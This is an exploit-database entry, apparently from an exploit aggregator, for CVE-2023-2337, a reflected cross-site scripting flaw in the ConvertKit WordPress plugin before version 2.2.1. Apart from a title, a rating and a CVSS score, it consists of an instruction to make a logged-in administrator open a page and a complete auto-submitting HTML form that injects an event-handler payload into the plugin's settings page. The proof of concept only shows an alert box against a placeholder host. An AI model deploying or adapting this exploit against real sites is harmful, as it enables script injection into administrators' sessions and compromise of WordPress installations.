Exploit for ConvertKit < 2.2.1 - Reflected XSS CVE-2023-2337

Name: Exploit for ConvertKit < 2.2.1 - Reflected XSS CVE-2023-2337
Rating: 5 (3 reviews)

2023-05-15 | CVSS 8.6

## https://sploitus.com/exploit?id=WPEX-ID:E5A6F834-80A4-406B-ACAE-57FFEEC2E689
Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://example.com/wp-admin/options-general.php?page=_wp_convertkit_settings" method="POST">
      <input type="hidden" name="page" value='"style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>